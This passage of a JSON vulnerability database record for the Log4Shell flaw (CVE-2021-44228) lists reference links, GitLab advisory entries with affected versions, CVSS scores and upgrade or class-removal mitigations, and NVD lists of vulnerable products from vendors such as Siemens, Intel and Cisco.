"url": "https://github.com/cisagov/log4j-affected-db"
},
{
"name": "https://support.apple.com/kb/HT213189",
"refsource": "CONFIRM",
"url": "https://support.apple.com/kb/HT213189"
},
{
"name": "https://www.oracle.com/security-alerts/cpuapr2022.html",
"refsource": "MISC",
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"name": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228",
"refsource": "MISC",
"url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228"
},
{
"name": "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html",
"refsource": "MISC",
"url": "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html"
},
{
"name": "20220721 Open-Xchange Security Advisory 2022-07-21",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2022/Jul/11"
},
{
"name": "http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html"
},
{
"name": "http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html"
},
{
"name": "20221208 Intel Data Center Manager \u003c= 5.1 Local Privileges Escalation",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2022/Dec/2"
},
{
"name": "http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html"
}
]
},
"source": {
"discovery": "UNKNOWN"
}
},
"gitlab.com": {
"advisories": [
{
"affected_range": "(,0)",
"affected_versions": "None",
"cvss_v2": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"cwe_ids": [
"CWE-1035",
"CWE-502",
"CWE-937"
],
"date": "2021-12-13",
"description": "This advisory has been marked as a false positive.",
"fixed_versions": [],
"identifier": "CVE-2021-44228",
"identifiers": [
"CVE-2021-44228",
"GHSA-jfh8-c2jp-5v3q"
],
"not_impacted": "",
"package_slug": "maven/org.apache.logging.log4j/log4j-api",
"pubdate": "2021-12-10",
"solution": "Nothing to be done.",
"title": "Improper Neutralization of Special Elements in Output Used by a Downstream Component (\u0027Injection\u0027)",
"urls": [
"https://www.lunasec.io/docs/blog/log4j-zero-day/",
"https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126"
],
"uuid": "1f39f0d1-1df2-4f3e-b68c-41fa5952b444"
},
{
"affected_range": "[2.0,2.3.1],[2.4.0,2.12.2),[2.13.0,2.15.0)",
"affected_versions": "All versions starting from 2.0 up to 2.3.1, all versions starting from 2.4.0 before 2.12.2, all versions starting from 2.13.0 before 2.15.0",
"cvss_v2": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"cwe_ids": [
"CWE-1035",
"CWE-20",
"CWE-937"
],
"date": "2023-04-03",
"description": "JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j, this behavior has been disabled by default. In previous releases (\u003e2.10) this behavior can be mitigated by setting system property `log4j2.formatMsgNoLookups` to `true` or it can be mitigated in prior releases (\u003c2.10) by removing the JndiLookup class from the classpath (example, `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).",
"fixed_versions": [
"2.3.2",
"2.12.2",
"2.15.0"
],
"identifier": "CVE-2021-44228",
"identifiers": [
"CVE-2021-44228",
"GHSA-jfh8-c2jp-5v3q"
],
"not_impacted": "All versions before 2.0, all versions after 2.3.1 before 2.4.0, all versions starting from 2.12.2 before 2.13.0, all versions starting from 2.15.0",
"package_slug": "maven/org.apache.logging.log4j/log4j-core",
"pubdate": "2021-12-10",
"solution": "Upgrade to versions 2.3.2, 2.12.2, 2.15.0 or above.",
"title": "Improper Neutralization of Special Elements in Output Used by a Downstream Component (\u0027Injection\u0027)",
"urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"https://www.lunasec.io/docs/blog/log4j-zero-day/",
"https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126"
],
"uuid": "a1a68216-be96-42ea-a47c-5e4fc4f8318c"
},
{
"affected_range": "[2.0,2.3.1],[2.4.0,2.12.2),[2.13.0,2.15.0)",
"affected_versions": "All versions starting from 2.0 up to 2.3.1, all versions starting from 2.4.0 before 2.12.2, all versions starting from 2.13.0 before 2.15.0",
"cvss_v2": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"cwe_ids": [
"CWE-1035",
"CWE-20",
"CWE-937"
],
"date": "2023-04-03",
"description": "JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j, this behavior has been disabled by default. In previous releases (\u003e2.10) this behavior can be mitigated by setting system property `log4j2.formatMsgNoLookups` to `true` or it can be mitigated in prior releases (\u003c2.10) by removing the JndiLookup class from the classpath (example, `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).",
"fixed_versions": [
"2.3.2",
"2.12.2",
"2.15.0"
],
"identifier": "CVE-2021-44228",
"identifiers": [
"CVE-2021-44228",
"GHSA-jfh8-c2jp-5v3q"
],
"not_impacted": "All versions before 2.0, all versions after 2.3.1 before 2.4.0, all versions starting from 2.12.2 before 2.13.0, all versions starting from 2.15.0",
"package_slug": "maven/org.apache.logging.log4j/log4j",
"pubdate": "2021-12-10",
"solution": "Upgrade to versions 2.3.2, 2.12.2, 2.15.0 or above.",
"title": "Improper Neutralization of Special Elements in Output Used by a Downstream Component (\u0027Injection\u0027)",
"urls": [
"https://www.lunasec.io/docs/blog/log4j-zero-day/",
"https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126"
],
"uuid": "4e9a17d3-27b2-49e3-b977-f017a4855aa7"
}
]
},
"nvd.nist.gov": {
"configurations": {
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:apache:log4j:2.0:rc1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:apache:log4j:2.0:beta9:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:apache:log4j:2.0:rc2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:apache:log4j:2.0:-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.15.0",
"versionStartIncluding": "2.13.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.3.1",
"versionStartIncluding": "2.0.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.12.2",
"versionStartIncluding": "2.4.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:siemens:sppa-t3000_ses3000_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:siemens:sppa-t3000_ses3000:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:siemens:logo\\!_soft_comfort:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:spectrum_power_4:4.70:sp7:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:spectrum_power_4:4.70:-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:spectrum_power_4:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.70",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:siveillance_control_pro:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:energyip_prepay:3.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:energyip_prepay:3.8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:spectrum_power_4:4.70:sp8:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:siveillance_identity:1.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:siveillance_identity:1.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:siveillance_command:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "4.16.2.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:sipass_integrated:2.85:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:sipass_integrated:2.80:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:head-end_system_universal_device_integration_system:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:gma-manager:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "8.6.2j-398",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:energyip:8.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:energyip:8.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:energyip:8.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:energyip:9.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:energy_engage:3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:e-car_operation_center:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2021-12-13",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:desigo_cc_info_center:5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:desigo_cc_info_center:5.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:desigo_cc_advanced_reports:5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:desigo_cc_advanced_reports:5.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:comos:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:captial:2019.1:sp1912:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:navigator:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2021-12-13",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:xpedition_package_integrator:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:xpedition_enterprise:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:vesys:2019.1:sp1912:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:vesys:2019.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:vesys:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:vesys:2019.1:-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:teamcenter:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:spectrum_power_7:2.30:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:spectrum_power_7:2.30:-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:spectrum_power_7:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.30",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:spectrum_power_7:2.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:solid_edge_harness_design:2020:sp2002:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:solid_edge_harness_design:2020:-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:solid_edge_harness_design:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2020",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:captial:2019.1:-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:solid_edge_harness_design:2020:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:solid_edge_cam_pro:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:siveillance_viewpoint:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:siveillance_vantage:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:siguard_dsa:4.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:siguard_dsa:4.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:siguard_dsa:4.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:sentron_powermanager:4.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:sentron_powermanager:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:operation_scheduler:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.1.3",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:nx:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:opcenter_intelligence:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.2",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:mindsphere:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2021-12-11",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:mendix:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:industrial_edge_management_hub:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2021-12-13",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:industrial_edge_management:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:siemens:captial:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019.1",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:intel:audio_development_kit:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:intel:system_debugger:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:intel:secure_device_onboard:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:intel:oneapi_sample_browser:-:*:*:*:*:eclipse:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:intel:sensor_solution_firmware_development_kit:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:intel:computer_vision_annotation_tool:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:intel:genomics_kernel_library:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:intel:system_studio:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:intel:data_center_manager:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.1",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sonicwall:email_security:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "10.0.12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:netapp:cloud_insights:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:linux:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:netapp:cloud_manager:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:netapp:cloud_secure_agent:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:netapp:ontap_tools:-:*:*:*:*:vmware_vsphere:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:vmware_vsphere:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager_im_and_presence_service:11.5\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_customer_voice_portal:11.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:packaged_contact_center_enterprise:11.6\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:identity_services_engine:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.4.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:data_center_network_manager:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "11.3\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:4.0:-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:4.0:maintenance_release1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:4.0:maintenance_release2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:4.0:maintenance_release3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_express:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "12.5\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:data_center_network_manager:11.3\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3:-:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_service_pack_2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_service_pack_3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_security_patch4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:identity_services_engine:2.4.0:-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:finesse:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "12.6\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:finesse:12.6\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:nexus_dashboard:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.1.2",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.6.3.1",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.5.4.1",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.3.5.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:iot_operations_dashboard:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:intersight_virtual_appliance:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.9-361",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:evolved_programmable_network_manager:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "4.1.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.4.5.2",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:dna_spaces\\:_connector:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.5",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cyber_vision_sensor_management_extension:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.0.3",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_zero_touch_provisioning:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.0.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_zero_touch_provisioning:3.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_platform_infrastructure:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.0.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_platform_infrastructure:4.1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_optimization_engine:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.0.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_optimization_engine:3.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_network_controller:3.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_network_controller:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.0.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_data_gateway:3.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_data_gateway:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.0.2",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:*:*:*:*:*:*:*:*",
"cpe_name": [],
